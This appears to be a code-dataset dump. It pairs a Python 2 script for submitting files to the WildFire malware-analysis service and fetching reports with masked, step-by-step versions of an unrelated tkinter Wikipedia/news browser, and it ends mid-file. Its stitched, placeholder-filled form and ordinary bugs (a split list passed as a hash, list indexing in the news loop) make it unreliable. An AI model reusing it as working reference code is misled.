print 'HTTP Error %s: Cannot find report associated with requested hash' % error_code
sys.exit()
elif error_code == 405:
print 'HTTP Error %s: You must use the POST method for this call' % error_code
sys.exit()
elif error_code == 413:
print "HTTP Error %s: Sample file size exceeds maximum WildFire allowed size" % error_code
sys.exit()
elif error_code == 418:
print "HTTP Error %s: Sample file type is unsupported" % error_code
sys.exit()
elif error_code == 419:
print "HTTP Error %s: You have exceeded your maximum number of requests per day" % error_code
sys.exit()
elif error_code == 420:
print "HTTP Error %s: Insufficient arguments for accessing the API" % error_code
sys.exit()
elif error_code == 421:
print 'HTTP Error %s: Invalid arguments for accessing the API' % error_code
sys.exit()
elif error_code == 500:
print "HTTP Error %s: WildFire cloud is currently experiencing issues, please try again later" % error_code
sys.exit()
elif error_code == 513:
print 'HTTP Error %s: File upload to WildFire has failed, please check file and try again' % error_code
sys.exit()
else:
print 'An unknown error has occurred, the HTTP status code is ', error_code
sys.exit()
def upload_wf_control(wf_args):
'''
This is a control function to access the upload_wf_file function. For directories, it will look through all the
files in the directory and upload them. For single files, it will push through the single upload.
:param wf_args: These are the parsed CLI arguments from the previous parse_args function.
:return: Nothing, this is a control function which calls another function.
'''
if wf_args.dir:
try:
for file in os.listdir(wf_args.dir):
upload_wf_file(wf_args, '%s/%s' %(wf_args.dir, file))
except OSError as err:
print '%s -> %s' % (err.strerror, wf_args.dir)
elif wf_args.file:
upload_wf_file(wf_args, wf_args.file)
else:
print 'Something went wrong, you should never see this error.'
sys.exit()
def upload_wf_file(wf_args, filename):
'''
This function is used to upload files into the WildFire Cloud
:param wf_args: This is the parsed CLI arguments from the called parse_args function.
:param wf_file: This is the name of the file from either the args.file or from the read directory on args.dir
:return: Nothing, this function only uploads files into the WildFire Cloud.
'''
global wf_upload_url
wf_headers = {'apikey': wf_args.api_key}
try:
wf_file = {'file': open(filename, 'rb')}
except IOError as err:
print 'Unable to open file "%s", %s' % (wf_file, err.strerror)
sys.exit()
try:
wf_req = requests.post(wf_upload_url, data=wf_headers, files=wf_file)
except requests.exceptions.ConnectionError:
print 'An error has occurred contacting %s, please check the URL and try again.' % wf_upload_url
sys.exit()
if wf_req.status_code != requests.codes.ok:
wf_error_codes(wf_req.status_code)
else:
print 'Successfully uploaded %s with SHA256 hash %s' % (filename, xml.dom.minidom.parseString(wf_req.text).getElementsByTagName('sha256')[0].firstChild.nodeValue)
def pull_wf_report(hash, args):
'''
This function will pull down reports from the WildFire Cloud. It can be pulled down in either PDF or XML formats,
the reports will then be written to the file of the appropriate type.
:param args: This is the parsed CLI arguments from the called parse_args function. All components needed will be
pulled from this passed parameter.
:return: Nothing, this function only pulls down reports from the WildFire Cloud.
'''
global wf_report_url
wf_headers = {"apikey": args.api_key, "hash": hash, "format": str(args.format).lower()}
wf_filename = 'wildfire-report-%s.%s' % (hash, str(args.format).lower())
try:
wf_req = requests.post(wf_report_url, data=wf_headers)
except requests.exceptions.ConnectionError:
print 'An error has occurred contacting %s, please check the URL and try again.' % wf_report_url
sys.exit()
if wf_req.status_code != requests.codes.ok:
wf_error_codes(wf_req.status_code)
else:
print 'Successfully pulled report wildfire-report-%s.%s' % (hash, str(args.format).lower())
with open(wf_filename, 'wb') as wf_dataout:
wf_dataout.write(wf_req.content)
def multi_hash(args):
'''
This function will roll through a file one line at a time to pull the associated hashes on that line. It will
assume that there is a single hash per line and chop off anything after a space.
:param args: This is the parsed CLI arguments from the called parse_args function. All components needed will be
pulled from this passed parameter.
:return: Nothing, this function only loops and calls the pull_wf_report function for pulling reports.
'''
with open(args.hashfile, 'r') as hashes:
for hash in hashes:
hash = hash.split() # Drop anything after a space character
pull_wf_report(hash, args)
def main():
args_parser, args = parse_args()
if args.hash:
pull_wf_report(args.hash, args)
elif args.hashfile:
multi_hash(args)
else:
upload_wf_control(args)
pass
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "e8e78610df4461a96f7d9858870de0e3482801fd",
"index": 5083,
"step-1": "#!/usr/bin/env python\n\nimport argparse\nimport requests\nimport sys\nimport os\nimport xml.dom.minidom\n\n__author__ = 'Tighe Schlottog || [email protected]'\n\n'''\n wf.py is a script to interact with the WildFire API to upload files or pull back reports on specific hashes. You\n need to have the argparse and requests installed. Both modules perform their functions perfectly for the work that\n is looking to be completed.\n\n For functional assistance, check out the -h or --help options while executing the wf.py script.\n\n Currently the script is configured to use the WildFire public cloud, but you can easily adapt it to use your WF-500.\n\n This script is only for use with file uploads and report pulling.\n\n File uploads are completed and the WildFire reported SHA256 hash will be output.\n Report pulls are written in the format of wildfire-report-<SHA256 hash>.<report format>, they can be either PDF or\n XML.\n'''\n\n# Global Variables (only edit these)\nwf_upload_url = 'https://wildfire.paloaltonetworks.com/publicapi/submit/file'\nwf_report_url = 'https://wildfire.paloaltonetworks.com/publicapi/get/report'\n\n\ndef parse_args():\n '''\n This function is used to parse the CLI arguments that are passed into the function, after parsing the data it will\n return both the parser itself and the parsed arguments. While not needed, the parser is passed back in case of\n future need.\n :return: parser - the argparse parser itself\n :return: args - the parsed CLI arguments\n '''\n parser = argparse.ArgumentParser(description='Script to upload unknown files to WildFire.')\n group = parser.add_mutually_exclusive_group()\n group.add_argument('-f', '--file', type=str, help='Location of file to upload to WildFire')\n group.add_argument('-d', '--dir', type=str, help='Location of directory of files to upload to WildFire')\n parser.add_argument('-hash', type=str, help='SHA256 hash of file to pull report from WildFire')\n parser.add_argument('-api_key', type=str, help='WildFire API Key')\n parser.add_argument('-format', type=str, default='pdf', help='Report file format (either xml or pdf)')\n parser.add_argument('-hf', '--hashfile', type=str, help='File of hashes to pull reports from WildFire')\n args = parser.parse_args()\n check_args(parser, args)\n return parser, args\n\n\ndef check_args(parser, wf_args):\n '''\n This function will take in the parser and the parsed args and will perform some basic verification checks. The\n checks themselves are more complicated than rules that I can feed into the argparse module.\n :param parser: argparse parser\n :param wf_args: parsed CLI arguments, came from the parser argparse handler\n :return: Nothing, this is just a basic verification check. The function will exit the entire script if it doesn't\n pass muster.\n '''\n if not (((wf_args.file or wf_args.dir) or ((str(wf_args.format).lower() != 'xml' or str(wf_args.format).lower() != 'pdf')and wf_args.hash)) and wf_args.api_key):\n print \"You are missing one of the necessary options, please check your command structure and try again.\"\n parser.print_help()\n sys.exit()\n\n\ndef wf_error_codes(error_code):\n '''\n This function will take in the HTTP error codes from the requests function in both the upload and download functions\n and parse them out into human readable error messages.\n :param error_code: http error code from the requests module functions (req_handler.status_code)\n :return: Nothing, this will dump human readable errors and exit the script.\n '''\n if error_code == 401:\n print \"HTTP Error %s: API Key is invalid, please retry with valid WildFire API key\" % error_code\n sys.exit()\n elif error_code == 404:\n print 'HTTP Error %s: Cannot find report associated with requested hash' % error_code\n sys.exit()\n elif error_code == 405:\n print 'HTTP Error %s: You must use the POST method for this call' % error_code\n sys.exit()\n elif error_code == 413:\n print \"HTTP Error %s: Sample file size exceeds maximum WildFire allowed size\" % error_code\n sys.exit()\n elif error_code == 418:\n print \"HTTP Error %s: Sample file type is unsupported\" % error_code\n sys.exit()\n elif error_code == 419:\n print \"HTTP Error %s: You have exceeded your maximum number of requests per day\" % error_code\n sys.exit()\n elif error_code == 420:\n print \"HTTP Error %s: Insufficient arguments for accessing the API\" % error_code\n sys.exit()\n elif error_code == 421:\n print 'HTTP Error %s: Invalid arguments for accessing the API' % error_code\n sys.exit()\n elif error_code == 500:\n print \"HTTP Error %s: WildFire cloud is currently experiencing issues, please try again later\" % error_code\n sys.exit()\n elif error_code == 513:\n print 'HTTP Error %s: File upload to WildFire has failed, please check file and try again' % error_code\n sys.exit()\n else:\n print 'An unknown error has occurred, the HTTP status code is ', error_code\n sys.exit()\n\n\ndef upload_wf_control(wf_args):\n '''\n This is a control function to access the upload_wf_file function. For directories, it will look through all the\n files in the directory and upload them. For single files, it will push through the single upload.\n :param wf_args: These are the parsed CLI arguments from the previous parse_args function.\n :return: Nothing, this is a control function which calls another function.\n '''\n if wf_args.dir:\n try:\n for file in os.listdir(wf_args.dir):\n upload_wf_file(wf_args, '%s/%s' %(wf_args.dir, file))\n except OSError as err:\n print '%s -> %s' % (err.strerror, wf_args.dir)\n elif wf_args.file:\n upload_wf_file(wf_args, wf_args.file)\n else:\n print 'Something went wrong, you should never see this error.'\n sys.exit()\n\n\ndef upload_wf_file(wf_args, filename):\n '''\n This function is used to upload files into the WildFire Cloud\n :param wf_args: This is the parsed CLI arguments from the called parse_args function.\n :param wf_file: This is the name of the file from either the args.file or from the read directory on args.dir\n :return: Nothing, this function only uploads files into the WildFire Cloud.\n '''\n global wf_upload_url\n wf_headers = {'apikey': wf_args.api_key}\n try:\n wf_file = {'file': open(filename, 'rb')}\n except IOError as err:\n print 'Unable to open file \"%s\", %s' % (wf_file, err.strerror)\n sys.exit()\n\n try:\n wf_req = requests.post(wf_upload_url, data=wf_headers, files=wf_file)\n except requests.exceptions.ConnectionError:\n print 'An error has occurred contacting %s, please check the URL and try again.' % wf_upload_url\n sys.exit()\n\n if wf_req.status_code != requests.codes.ok:\n wf_error_codes(wf_req.status_code)\n else:\n print 'Successfully uploaded %s with SHA256 hash %s' % (filename, xml.dom.minidom.parseString(wf_req.text).getElementsByTagName('sha256')[0].firstChild.nodeValue)\n\n\ndef pull_wf_report(hash, args):\n '''\n This function will pull down reports from the WildFire Cloud. It can be pulled down in either PDF or XML formats,\n the reports will then be written to the file of the appropriate type.\n :param args: This is the parsed CLI arguments from the called parse_args function. All components needed will be\n pulled from this passed parameter.\n :return: Nothing, this function only pulls down reports from the WildFire Cloud.\n '''\n global wf_report_url\n wf_headers = {\"apikey\": args.api_key, \"hash\": hash, \"format\": str(args.format).lower()}\n wf_filename = 'wildfire-report-%s.%s' % (hash, str(args.format).lower())\n\n try:\n wf_req = requests.post(wf_report_url, data=wf_headers)\n except requests.exceptions.ConnectionError:\n print 'An error has occurred contacting %s, please check the URL and try again.' % wf_report_url\n sys.exit()\n\n if wf_req.status_code != requests.codes.ok:\n wf_error_codes(wf_req.status_code)\n else:\n print 'Successfully pulled report wildfire-report-%s.%s' % (hash, str(args.format).lower())\n with open(wf_filename, 'wb') as wf_dataout:\n wf_dataout.write(wf_req.content)\n\n\ndef multi_hash(args):\n '''\n This function will roll through a file one line at a time to pull the associated hashes on that line. It will\n assume that there is a single hash per line and chop off anything after a space.\n :param args: This is the parsed CLI arguments from the called parse_args function. All components needed will be\n pulled from this passed parameter.\n :return: Nothing, this function only loops and calls the pull_wf_report function for pulling reports.\n '''\n with open(args.hashfile, 'r') as hashes:\n for hash in hashes:\n hash = hash.split() # Drop anything after a space character\n pull_wf_report(hash, args)\n\n\ndef main():\n args_parser, args = parse_args()\n if args.hash:\n pull_wf_report(args.hash, args)\n elif args.hashfile:\n multi_hash(args)\n else:\n upload_wf_control(args)\n pass\n\n\nif __name__ == '__main__':\n main()\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
class MainWindow:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def search_wikipedia(self):
"""Safely browse wikipedia articles."""
self.summary.delete('1.0', tk.END)
possibilities = wk.search(self.search_box.get('1.0', tk.END).
replace('\n', ''))
if len(possibilities) > 0:
try:
p = wk.page(possibilities[0])
except wk.DisambiguationError as e:
p = wk.page(e.options[0])
self.summary.configure(state='normal')
self.summary.delete('1.0', tk.END)
self.summary.insert('1.0', p.summary)
self.summary.configure(state='disabled')
self.p = p
self.update_category_map(p.categories)
self.get_news()
return None
def update_choice(self, value):
"""Update box based on menu choice."""
if self.p is not None:
if value == 'none':
self.other_text.delete('1.0', tk.END)
self.other_text.insert('1.0', '')
if value == 'categories':
self.other_text.delete('1.0', tk.END)
self.other_text.insert('1.0', self.p.categories)
if value == 'pageid':
self.other_text.delete('1.0', tk.END)
self.other_text.insert('1.0', self.p.pageid)
if value == 'sections':
self.other_text.delete('1.0', tk.END)
self.other_text.insert('1.0', self.p.sections)
if value == 'html':
self.other_text.delete('1.0', tk.END)
self.other_text.insert('1.0', self.p.html())
def randomize(self):
"""Randomize wikipedia article."""
self.search_box.delete('1.0', tk.END)
self.search_box.insert('1.0', wk.random())
self.search_wikipedia()
def update_category_map(self, category_list):
"""Update the category map after a search."""
for category in category_list:
skip = False
for i in ['wiki', 'sources', 'article', 'stub', 'wayback', 'cs1']:
if i in category.lower():
skip = True
if skip:
continue
if category in self.category_map:
self.category_map[category] += 1
else:
self.category_map[category] = 1
self.update_top_categories()
def update_top_categories(self):
"""Update the top categories text box."""
cats = self.sorted_categories()
display = ''
for cat in cats:
hit = 'hits' if self.category_map[cat] > 1 else 'hit'
display += f'{cat}, {self.category_map[cat]} {hit}\n'
self.top_categories.configure(state='normal')
self.top_categories.delete('1.0', tk.END)
self.top_categories.insert('1.0', display)
self.top_categories.configure(state='disabled')
def sorted_categories(self):
"""Sort categories by hits."""
count = lambda category: self.category_map[category]
l = sorted(self.category_map, key=count, reverse=True)
if len(l) > 5:
return l[:5]
else:
return l
def get_news(self):
"""Get news using News API."""
if self.api_key_entry.get() == '':
return None
api = nac(api_key=self.api_key_entry.get())
now = datetime.datetime.utcnow()
two_weeks = now - datetime.timedelta(days=14)
query = ''
for cat in self.sorted_categories():
query += f'{cat},'
search = api.get_top_headlines(q=query, sources=
'bbc-news,the-verge', language='en')
news = ''
for article in search['articles']:
news += f"{search['articles'][article]['title']}\n"
self.news_box.delete('1.0', tk.END)
self.news_box.insert('1.0', news)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MainWindow:
<|reserved_special_token_0|>
def __init__(self):
self.p = None
self.main_page = tk.Tk()
self.main_page.title('MetaWikipedia')
self.main_page.geometry('500x500')
self.style = ThemedStyle(self.main_page)
self.style.set_theme('scidblue')
self.left_pane = ttk.PanedWindow(self.main_page)
self.right_pane = ttk.PanedWindow(self.main_page)
self.search = ttk.Button(self.left_pane, text='Search', command=
self.search_wikipedia)
self.search.place(relx=0, rely=0, relheight=0.1, relwidth=0.5)
self.randomize_but = ttk.Button(self.left_pane, text='Randomize',
command=self.randomize)
self.randomize_but.place(relx=0.5, rely=0, relheight=0.1, relwidth=0.5)
self.search_box = tk.Text(self.left_pane)
self.search_box.place(relx=0, rely=0.1, relheight=0.1, relwidth=1)
self.summary = tk.Text(self.left_pane, wrap=tk.WORD)
self.summary.place(relx=0, rely=0.2, relheight=0.4, relwidth=1)
extra_list_choices = ['none', 'categories', 'pageid', 'sections',
'html']
self.extra_list_choice = tk.StringVar()
self.extra_list_choice.set('none')
self.extra_list = ttk.OptionMenu(self.left_pane, self.
extra_list_choice, *extra_list_choices, command=self.update_choice)
self.extra_list.place(relx=0, rely=0.6, relheight=0.1, relwidth=1)
self.other_text = tk.Text(self.left_pane)
self.other_text.place(relx=0, rely=0.7, relheight=0.3, relwidth=1)
self.api_key_label = ttk.Label(self.right_pane, text='API Key')
self.api_key_label.place(relx=0, rely=0, relheight=0.1, relwidth=0.4)
self.api_key_entry = ttk.Entry(self.right_pane, text='ABC...')
self.api_key_entry.place(relx=0.4, rely=0, relheight=0.1, relwidth=0.6)
self.news_box = tk.Text(self.right_pane)
self.news_box.place(relx=0, rely=0.1, relheight=0.5, relwidth=1)
self.top_categories_label = ttk.Label(self.right_pane, text=
'Top Categories')
self.top_categories_label.place(relx=0, rely=0.6, relheight=0.1,
relwidth=1)
self.top_categories = tk.Text(self.right_pane)
self.top_categories.place(relx=0, rely=0.7, relheight=0.3, relwidth=1)
self.category_map = {}
self.randomize()
self.left_pane.place(relx=0, rely=0, relheight=1, relwidth=0.5)
self.right_pane.place(relx=0.5, rely=0, relheight=1, relwidth=0.5)
self.main_page.mainloop()
def search_wikipedia(self):
"""Safely browse wikipedia articles."""
self.summary.delete('1.0', tk.END)
possibilities = wk.search(self.search_box.get('1.0', tk.END).
replace('\n', ''))
if len(possibilities) > 0:
try:
p = wk.page(possibilities[0])
except wk.DisambiguationError as e:
p = wk.page(e.options[0])
self.summary.configure(state='normal')
self.summary.delete('1.0', tk.END)
self.summary.insert('1.0', p.summary)
self.summary.configure(state='disabled')
self.p = p
self.update_category_map(p.categories)
self.get_news()
return None
def update_choice(self, value):
"""Update box based on menu choice."""
if self.p is not None:
if value == 'none':
self.other_text.delete('1.0', tk.END)
self.other_text.insert('1.0', '')
if value == 'categories':
self.other_text.delete('1.0', tk.END)
self.other_text.insert('1.0', self.p.categories)
if value == 'pageid':
self.other_text.delete('1.0', tk.END)
self.other_text.insert('1.0', self.p.pageid)
if value == 'sections':
self.other_text.delete('1.0', tk.END)
self.other_text.insert('1.0', self.p.sections)
if value == 'html':
self.other_text.delete('1.0', tk.END)
self.other_text.insert('1.0', self.p.html())
def randomize(self):
"""Randomize wikipedia article."""
self.search_box.delete('1.0', tk.END)
self.search_box.insert('1.0', wk.random())
self.search_wikipedia()
def update_category_map(self, category_list):
"""Update the category map after a search."""
for category in category_list:
skip = False
for i in ['wiki', 'sources', 'article', 'stub', 'wayback', 'cs1']:
if i in category.lower():
skip = True
if skip:
continue
if category in self.category_map:
self.category_map[category] += 1
else:
self.category_map[category] = 1
self.update_top_categories()
def update_top_categories(self):
"""Update the top categories text box."""
cats = self.sorted_categories()
display = ''
for cat in cats:
hit = 'hits' if self.category_map[cat] > 1 else 'hit'
display += f'{cat}, {self.category_map[cat]} {hit}\n'
self.top_categories.configure(state='normal')
self.top_categories.delete('1.0', tk.END)
self.top_categories.insert('1.0', display)
self.top_categories.configure(state='disabled')
def sorted_categories(self):
"""Sort categories by hits."""
count = lambda category: self.category_map[category]
l = sorted(self.category_map, key=count, reverse=True)
if len(l) > 5:
return l[:5]
else:
return l
def get_news(self):
"""Get news using News API."""
if self.api_key_entry.get() == '':
return None
api = nac(api_key=self.api_key_entry.get())
now = datetime.datetime.utcnow()
two_weeks = now - datetime.timedelta(days=14)
query = ''
for cat in self.sorted_categories():
query += f'{cat},'
search = api.get_top_headlines(q=query, sources=
'bbc-news,the-verge', language='en')
news = ''
for article in search['articles']:
news += f"{search['articles'][article]['title']}\n"
self.news_box.delete('1.0', tk.END)
self.news_box.insert('1.0', news)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MainWindow:
"""Application controller object."""
def __init__(self):
self.p = None
self.main_page = tk.Tk()
self.main_page.title('MetaWikipedia')
self.main_page.geometry('500x500')
self.style = ThemedStyle(self.main_page)
self.style.set_theme('scidblue')
self.left_pane = ttk.PanedWindow(self.main_page)
self.right_pane = ttk.PanedWindow(self.main_page)
self.search = ttk.Button(self.left_pane, text='Search', command=
self.search_wikipedia)
self.search.place(relx=0, rely=0, relheight=0.1, relwidth=0.5)
self.randomize_but = ttk.Button(self.left_pane, text='Randomize',
command=self.randomize)
self.randomize_but.place(relx=0.5, rely=0, relheight=0.1, relwidth=0.5)
self.search_box = tk.Text(self.left_pane)
self.search_box.place(relx=0, rely=0.1, relheight=0.1, relwidth=1)
self.summary = tk.Text(self.left_pane, wrap=tk.WORD)
self.summary.place(relx=0, rely=0.2, relheight=0.4, relwidth=1)
extra_list_choices = ['none', 'categories', 'pageid', 'sections',
'html']
self.extra_list_choice = tk.StringVar()
self.extra_list_choice.set('none')
self.extra_list = ttk.OptionMenu(self.left_pane, self.
extra_list_choice, *extra_list_choices, command=self.update_choice)
self.extra_list.place(relx=0, rely=0.6, relheight=0.1, relwidth=1)
self.other_text = tk.Text(self.left_pane)
self.other_text.place(relx=0, rely=0.7, relheight=0.3, relwidth=1)
self.api_key_label = ttk.Label(self.right_pane, text='API Key')
self.api_key_label.place(relx=0, rely=0, relheight=0.1, relwidth=0.4)
self.api_key_entry = ttk.Entry(self.right_pane, text='ABC...')
self.api_key_entry.place(relx=0.4, rely=0, relheight=0.1, relwidth=0.6)
self.news_box = tk.Text(self.right_pane)
self.news_box.place(relx=0, rely=0.1, relheight=0.5, relwidth=1)
self.top_categories_label = ttk.Label(self.right_pane, text=
'Top Categories')
self.top_categories_label.place(relx=0, rely=0.6, relheight=0.1,
relwidth=1)
self.top_categories = tk.Text(self.right_pane)
self.top_categories.place(relx=0, rely=0.7, relheight=0.3, relwidth=1)
self.category_map = {}
self.randomize()
self.left_pane.place(relx=0, rely=0, relheight=1, relwidth=0.5)
self.right_pane.place(relx=0.5, rely=0, relheight=1, relwidth=0.5)
self.main_page.mainloop()
def search_wikipedia(self):
"""Safely browse wikipedia articles."""
self.summary.delete('1.0', tk.END)
possibilities = wk.search(self.search_box.get('1.0', tk.END).
replace('\n', ''))
if len(possibilities) > 0:
try:
p = wk.page(possibilities[0])
except wk.DisambiguationError as e:
p = wk.page(e.options[0])
self.summary.configure(state='normal')
self.summary.delete('1.0', tk.END)
self.summary.insert('1.0', p.summary)
self.summary.configure(state='disabled')
self.p = p
self.update_category_map(p.categories)
self.get_news()
return None
def update_choice(self, value):
"""Update box based on menu choice."""
if self.p is not None:
if value == 'none':
self.other_text.delete('1.0', tk.END)
self.other_text.insert('1.0', '')
if value == 'categories':
self.other_text.delete('1.0', tk.END)
self.other_text.insert('1.0', self.p.categories)
if value == 'pageid':
self.other_text.delete('1.0', tk.END)
self.other_text.insert('1.0', self.p.pageid)
if value == 'sections':
self.other_text.delete('1.0', tk.END)
self.other_text.insert('1.0', self.p.sections)
if value == 'html':
self.other_text.delete('1.0', tk.END)
self.other_text.insert('1.0', self.p.html())
def randomize(self):
"""Randomize wikipedia article."""
self.search_box.delete('1.0', tk.END)
self.search_box.insert('1.0', wk.random())
self.search_wikipedia()
def update_category_map(self, category_list):
"""Update the category map after a search."""
for category in category_list:
skip = False
for i in ['wiki', 'sources', 'article', 'stub', 'wayback', 'cs1']:
if i in category.lower():
skip = True
if skip:
continue
if category in self.category_map:
self.category_map[category] += 1
else:
self.category_map[category] = 1
self.update_top_categories()
def update_top_categories(self):
"""Update the top categories text box."""
cats = self.sorted_categories()
display = ''
for cat in cats:
hit = 'hits' if self.category_map[cat] > 1 else 'hit'
display += f'{cat}, {self.category_map[cat]} {hit}\n'
self.top_categories.configure(state='normal')
self.top_categories.delete('1.0', tk.END)
self.top_categories.insert('1.0', display)
self.top_categories.configure(state='disabled')
def sorted_categories(self):
"""Sort categories by hits."""
count = lambda category: self.category_map[category]
l = sorted(self.category_map, key=count, reverse=True)
if len(l) > 5:
return l[:5]
else:
return l
def get_news(self):
"""Get news using News API."""
if self.api_key_entry.get() == '':
return None
api = nac(api_key=self.api_key_entry.get())
now = datetime.datetime.utcnow()
two_weeks = now - datetime.timedelta(days=14)
query = ''
for cat in self.sorted_categories():
query += f'{cat},'
search = api.get_top_headlines(q=query, sources=
'bbc-news,the-verge', language='en')
news = ''
for article in search['articles']:
news += f"{search['articles'][article]['title']}\n"
self.news_box.delete('1.0', tk.END)
self.news_box.insert('1.0', news)
if __name__ == '__main__':
main_window = MainWindow()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import tkinter as tk
from tkinter import ttk
from ttkthemes import ThemedStyle
import wikipedia as wk
from newsapi import NewsApiClient as nac
import datetime
import random
class MainWindow:
"""Application controller object."""
def __init__(self):
self.p = None
self.main_page = tk.Tk()
self.main_page.title('MetaWikipedia')
self.main_page.geometry('500x500')
self.style = ThemedStyle(self.main_page)
self.style.set_theme('scidblue')
self.left_pane = ttk.PanedWindow(self.main_page)
self.right_pane = ttk.PanedWindow(self.main_page)
self.search = ttk.Button(self.left_pane, text='Search', command=
self.search_wikipedia)
self.search.place(relx=0, rely=0, relheight=0.1, relwidth=0.5)
self.randomize_but = ttk.Button(self.left_pane, text='Randomize',
command=self.randomize)
self.randomize_but.place(relx=0.5, rely=0, relheight=0.1, relwidth=0.5)
self.search_box = tk.Text(self.left_pane)
self.search_box.place(relx=0, rely=0.1, relheight=0.1, relwidth=1)
self.summary = tk.Text(self.left_pane, wrap=tk.WORD)
self.summary.place(relx=0, rely=0.2, relheight=0.4, relwidth=1)
extra_list_choices = ['none', 'categories', 'pageid', 'sections',
'html']
self.extra_list_choice = tk.StringVar()
self.extra_list_choice.set('none')
self.extra_list = ttk.OptionMenu(self.left_pane, self.
extra_list_choice, *extra_list_choices, command=self.update_choice)
self.extra_list.place(relx=0, rely=0.6, relheight=0.1, relwidth=1)
self.other_text = tk.Text(self.left_pane)
self.other_text.place(relx=0, rely=0.7, relheight=0.3, relwidth=1)
self.api_key_label = ttk.Label(self.right_pane, text='API Key')
self.api_key_label.place(relx=0, rely=0, relheight=0.1, relwidth=0.4)
self.api_key_entry = ttk.Entry(self.right_pane, text='ABC...')
self.api_key_entry.place(relx=0.4, rely=0, relheight=0.1, relwidth=0.6)
self.news_box = tk.Text(self.right_pane)
self.news_box.place(relx=0, rely=0.1, relheight=0.5, relwidth=1)
self.top_categories_label = ttk.Label(self.right_pane, text=
'Top Categories')
self.top_categories_label.place(relx=0, rely=0.6, relheight=0.1,
relwidth=1)
self.top_categories = tk.Text(self.right_pane)
self.top_categories.place(relx=0, rely=0.7, relheight=0.3, relwidth=1)
self.category_map = {}
self.randomize()
self.left_pane.place(relx=0, rely=0, relheight=1, relwidth=0.5)
self.right_pane.place(relx=0.5, rely=0, relheight=1, relwidth=0.5)
self.main_page.mainloop()
def search_wikipedia(self):
"""Safely browse wikipedia articles."""
self.summary.delete('1.0', tk.END)
possibilities = wk.search(self.search_box.get('1.0', tk.END).
replace('\n', ''))
if len(possibilities) > 0:
try:
p = wk.page(possibilities[0])
except wk.DisambiguationError as e:
p = wk.page(e.options[0])
self.summary.configure(state='normal')
self.summary.delete('1.0', tk.END)
self.summary.insert('1.0', p.summary)
self.summary.configure(state='disabled')
self.p = p
self.update_category_map(p.categories)
self.get_news()
return None
def update_choice(self, value):
"""Update box based on menu choice."""
if self.p is not None:
if value == 'none':
self.other_text.delete('1.0', tk.END)
self.other_text.insert('1.0', '')
if value == 'categories':
self.other_text.delete('1.0', tk.END)
self.other_text.insert('1.0', self.p.categories)
if value == 'pageid':
self.other_text.delete('1.0', tk.END)
self.other_text.insert('1.0', self.p.pageid)
if value == 'sections':
self.other_text.delete('1.0', tk.END)
self.other_text.insert('1.0', self.p.sections)
if value == 'html':
self.other_text.delete('1.0', tk.END)
self.other_text.insert('1.0', self.p.html())
def randomize(self):
"""Randomize wikipedia article."""
self.search_box.delete('1.0', tk.END)
self.search_box.insert('1.0', wk.random())
self.search_wikipedia()
def update_category_map(self, category_list):
"""Update the category map after a search."""
for category in category_list:
skip = False
for i in ['wiki', 'sources', 'article', 'stub', 'wayback', 'cs1']:
if i in category.lower():
skip = True
if skip:
continue
if category in self.category_map:
self.category_map[category] += 1
else:
self.category_map[category] = 1
self.update_top_categories()
def update_top_categories(self):
"""Update the top categories text box."""
cats = self.sorted_categories()
display = ''
for cat in cats:
hit = 'hits' if self.category_map[cat] > 1 else 'hit'
display += f'{cat}, {self.category_map[cat]} {hit}\n'
self.top_categories.configure(state='normal')
self.top_categories.delete('1.0', tk.END)
self.top_categories.insert('1.0', display)
self.top_categories.configure(state='disabled')
def sorted_categories(self):
"""Sort categories by hits."""
count = lambda category: self.category_map[category]
l = sorted(self.category_map, key=count, reverse=True)
if len(l) > 5:
return l[:5]
else:
return l
def get_news(self):
"""Get news using News API."""
if self.api_key_entry.get() == '':
return None
api = nac(api_key=self.api_key_entry.get())
now = datetime.datetime.utcnow()
two_weeks = now - datetime.timedelta(days=14)
query = ''
for cat in self.sorted_categories():
query += f'{cat},'
search = api.get_top_headlines(q=query, sources=
'bbc-news,the-verge', language='en')
news = ''
for article in search['articles']:
news += f"{search['articles'][article]['title']}\n"
self.news_box.delete('1.0', tk.END)
self.news_box.insert('1.0', news)
if __name__ == '__main__':
main_window = MainWindow()
<|reserved_special_token_1|>
"""main.py"""
import tkinter as tk
from tkinter import ttk
from ttkthemes import ThemedStyle
import wikipedia as wk
from newsapi import NewsApiClient as nac
import datetime
import random
class MainWindow:
"""Application controller object."""
def __init__(self):
self.p = None
self.main_page = tk.Tk()
self.main_page.title("MetaWikipedia")
self.main_page.geometry("500x500")
self.style = ThemedStyle(self.main_page)
self.style.set_theme("scidblue")
self.left_pane = ttk.PanedWindow(self.main_page)
self.right_pane = ttk.PanedWindow(self.main_page)
# Left pane
self.search = ttk.Button(self.left_pane, text="Search", command=self.search_wikipedia)
self.search.place(relx=0,rely=0,relheight=0.1,relwidth=0.5)
self.randomize_but = ttk.Button(self.left_pane, text="Randomize", command=self.randomize)
self.randomize_but.place(relx=0.5,rely=0,relheight=0.1,relwidth=0.5)
self.search_box = tk.Text(self.left_pane)
self.search_box.place(relx=0,rely=0.1,relheight=0.1,relwidth=1)
self.summary = tk.Text(self.left_pane, wrap=tk.WORD)
self.summary.place(relx=0,rely=0.2,relheight=0.4,relwidth=1)
extra_list_choices = ["none", "categories", "pageid", "sections", "html"]
self.extra_list_choice = tk.StringVar()
self.extra_list_choice.set("none")
self.extra_list = ttk.OptionMenu(
self.left_pane,
self.extra_list_choice,
*extra_list_choices,
command=self.update_choice
)
self.extra_list.place(relx=0,rely=.6,relheight=.1,relwidth=1)
self.other_text = tk.Text(self.left_pane)
self.other_text.place(relx=0,rely=0.7,relheight=.3,relwidth=1)
# Right pane
self.api_key_label = ttk.Label(self.right_pane, text="API Key")
self.api_key_label.place(relx=0, rely=0, relheight=0.1, relwidth=.4)
self.api_key_entry = ttk.Entry(self.right_pane, text="ABC...")
self.api_key_entry.place(relx=.4, rely=0, relheight=0.1, relwidth=.6)
self.news_box = tk.Text(self.right_pane)
self.news_box.place(relx=0, rely=.1, relheight=.5, relwidth=1)
self.top_categories_label = ttk.Label(self.right_pane, text="Top Categories")
self.top_categories_label.place(relx=0,rely=0.6,relheight=0.1,relwidth=1)
self.top_categories = tk.Text(self.right_pane)
